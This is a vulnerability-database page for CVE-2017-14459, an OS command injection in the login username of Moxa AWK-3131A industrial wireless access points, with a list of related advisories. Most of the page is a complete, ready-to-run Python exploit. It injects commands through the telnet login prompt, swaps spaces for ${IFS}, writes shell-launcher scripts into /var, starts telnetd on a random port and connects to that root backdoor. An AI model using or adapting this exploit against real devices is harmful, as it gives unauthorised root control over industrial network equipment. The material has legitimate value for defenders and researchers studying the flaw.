Moxa AWK-3131A 1.4 < 1.7 - Username OS Command Injection Exploit

🗓️ 04 Apr 2018 00:00:00Reported by TalosType

zdt🔗 0day.today👁 40 Views

Moxa AWK-3131A 1.4 < 1.7 Username OS Command Injection Exploit, Python Script Execution, Backdoor Connectio

Reporter	Title	Published	Views	Family All 9
BDU FSTEC	The vulnerability of the registration and accounting subsystem of the wireless access point for Moxa AWK-3131A industrial systems allows a intruder to execute arbitrary commands with root privileges.	12 Apr 201800:00	–	bdu_fstec
CNVD	Moxa AWK-3131A Operating System Command Injection Vulnerability	26 Apr 201800:00	–	cnvd
CVE	CVE-2017-14459	11 Apr 201816:00	–	cve
Cvelist	CVE-2017-14459	11 Apr 201816:00	–	cvelist
NVD	CVE-2017-14459	11 Apr 201816:29	–	nvd
Prion	Command injection	11 Apr 201816:29	–	prion
Talos	Moxa AWK-3131A Multiple Features Login Username Parameter OS Command Injection Vulnerability	3 Apr 201800:00	–	talos
Talos Blog	Vulnerability Spotlight: Moxa AWK-3131A Multiple Features Login Username Parameter OS Command Injection Vulnerability	3 Apr 201806:21	–	talosblog
Tenable Nessus	Moxa AWK OS Command Injection (CVE-2017-14459)	2 Aug 202300:00	–	nessus

#!/usr/bin/env python2
import telnetlib
import re
import random
import string
 
 
# Split string into chunks, of which each is <= length
def chunkstring(s, length):
    return (s[0+i:length+i] for i in range(0, len(s), length))
 
# Split strings based on MAX_LEN. Encode any newlines and/or spaces.
def split_script(script):
    MAX_LEN = 28 - len('printf${IFS}"">>/var/a') - 1
    completed = []
    temp = re.split('(\n)', script)
    for content in temp:
        if len(content) != 0:
            for s in re.split('( )', content):
                if ' ' in s:
                    s = '\\x20'
                if '\n' in s:
                    s = ['\\n']
                else:
                    s = list(chunkstring(s, MAX_LEN))
                completed.append(s)
 
    return [item for sublist in completed for item in sublist] # Flatten nested list items
 
# Execute each command via the username parameter
def do_cmd(host, command):
    tn = telnetlib.Telnet(host)
    modCommand = command.replace(' ', '${IFS}') # Spaces aren't allowed, replace with ${IFS}
    tn.read_until("login: ")
    tn.write("`%s`\n" % modCommand)
    print "Sent command: %s\n    modified: %s\n        size: %d" % (command, modCommand, len(modCommand))
    tn.read_until("Password: ")
    tn.write(" " + "\n")
    tn.read_until("incorrect")
    tn.close()
 
# Write script to writable directory on host
def write_script(host, script, t_dir, t_name):
    print "[*] Writing shell script to host..."
    i = 0
    for token in split_script(script):
        carat = '>' if i == 0 else '>>'
        do_cmd(host, 'printf "%s"%s%s/%s' % (token, carat, t_dir, t_name))
        i+=1
 
    do_cmd(host, 'chmod +x %s/%s' % (t_dir,t_name))
    print "[*] Script written to: %s/%s\n" % (t_dir,t_name)
 
# Attempt to connect to newly-created backdoor
def backdoor_connect(host,port):
    print "[*] Attempting to connect to backdoor @ %s:%d" % (host, port)
    tn = telnetlib.Telnet(host, port)
    tn.interact()
 
def main():
    host = "192.168.127.253"
    port = random.randint(2048,4096)
 
    w_dir = '/var' # writable directory
    s_name = random.choice(string.ascii_uppercase) # /bin/sh launcher
    t_name = s_name.lower() # telnetd launcher
 
    # Need a shell launcher script to launch /bin/sh because
    # telnetd adds a '-h' option to the login command
    shell_launcher = "#!/bin/sh\nexec sh"
 
    # Launch telnetd with the launcher script as the login
    # command to execute
    telnetd_launcher = "#!/bin/sh\ntelnetd -p%d -l%s/%s" % (port, w_dir,s_name)
 
    write_script(host, shell_launcher, w_dir, s_name)
    write_script(host, telnetd_launcher, w_dir, t_name)
 
    # Execute telnetd script and attempt to connect
    do_cmd(host, '.%s/%s' % (w_dir,t_name))
    backdoor_connect(host, port)
 
if __name__ == "__main__":
    main()

#  0day.today [2018-04-08]  #

04 Apr 2018 00:00Current

9.7High risk

Vulners AI Score9.7

EPSS0.19799